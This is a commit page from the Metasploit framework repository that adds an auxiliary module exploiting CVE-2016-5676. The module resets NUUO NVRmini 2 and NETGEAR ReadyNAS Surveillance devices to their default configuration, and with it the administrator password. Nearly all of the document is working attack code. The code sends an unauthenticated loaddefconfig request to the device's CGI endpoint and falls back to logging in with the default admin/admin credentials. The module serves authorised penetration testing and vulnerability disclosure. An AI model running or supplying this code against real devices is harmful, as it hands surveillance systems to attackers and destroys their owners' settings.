Browse Source

Land #7182, Nuuo / Netgear Surveillance admin password reset module

wchen-r7 3 years ago
parent
commit
de16a6d536
No account linked to committer's email address
1 changed files with 84 additions and 0 deletions
  1. 84
    0
      modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb

+ 84
- 0
modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb View File

@@ -0,0 +1,84 @@
1
+##
2
+# This module requires Metasploit: http://metasploit.com/download
3
+# Current source: https://github.com/rapid7/metasploit-framework
4
+##
5
+
6
+require 'msf/core'
7
+
8
+class MetasploitModule < Msf::Auxiliary
9
+
10
+  include Msf::Exploit::Remote::HttpClient
11
+  include Msf::Auxiliary::Report
12
+
13
+  def initialize(info = {})
14
+    super(update_info(info,
15
+      'Name'        => 'NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Default Configuration Load and Administrator Password Reset',
16
+      'Description' => %q{
17
+        The NVRmini 2 Network Video Recorded and the ReadyNAS Surveillance application are vulnerable
18
+        to an administrator password reset on the exposed web management interface.
19
+        Note that this only works for unauthenticated attackers in earlier versions of the Nuuo firmware
20
+        (before v1.7.6), otherwise you need an administrative user password.
21
+        This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance.
22
+        It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested
23
+        in those devices.
24
+      },
25
+      'Author' =>
26
+        [
27
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
28
+        ],
29
+      'License' => MSF_LICENSE,
30
+      'References' =>
31
+        [
32
+          ['CVE', '2016-5676'],
33
+          ['US-CERT-VU', '856152'],
34
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt'],
35
+          ['URL', 'http://seclists.org/bugtraq/2016/Aug/45']
36
+        ],
37
+      'DefaultTarget' => 0,
38
+      'DisclosureDate' => 'Aug 4 2016'))
39
+
40
+    register_options(
41
+      [
42
+        Opt::RPORT(8081),
43
+        OptString.new('TARGETURI', [true,  "Application path", '/']),
44
+        OptString.new('USERNAME', [false, 'The username to login as', 'admin']),
45
+        OptString.new('PASSWORD', [false, 'Password for the specified username', 'admin']),
46
+      ], self.class)
47
+  end
48
+
49
+
50
+  def run
51
+    res = send_request_cgi({
52
+        'uri' => normalize_uri(datastore['TARGETURI'], "cgi-bin", "cgi_system"),
53
+        'vars_get' => { 'cmd' => "loaddefconfig" }
54
+    })
55
+
56
+    if res && res.code == 401
57
+      res = send_request_cgi({
58
+              'method' => 'POST',
59
+              'uri' => normalize_uri(datastore['TARGETURI'], "login.php"),
60
+              'vars_post' => {
61
+                'user' => datastore['USERNAME'],
62
+                'pass' => datastore['PASSWORD'],
63
+                'submit' => "Login"
64
+              }
65
+      })
66
+      if res && (res.code == 200 || res.code == 302)
67
+        cookie = res.get_cookies
68
+      else
69
+        fail_with(Failure::Unknown, "#{peer} - A valid username / password is needed to reset the device.")
70
+      end
71
+      res = send_request_cgi({
72
+          'uri' => normalize_uri(datastore['TARGETURI'], "cgi-bin", "cgi_system"),
73
+          'cookie' => cookie,
74
+          'vars_get' => { 'cmd' => "loaddefconfig" }
75
+      })
76
+    end
77
+
78
+    if res && res.code == 200 && res.body.to_s =~ /load default configuration ok/
79
+      print_good("#{peer} - Device has been reset to the default configuration.")
80
+    else
81
+      print_error("#{peer} - Failed to reset device.")
82
+    end
83
+  end
84
+end

Loading…
Cancel
Save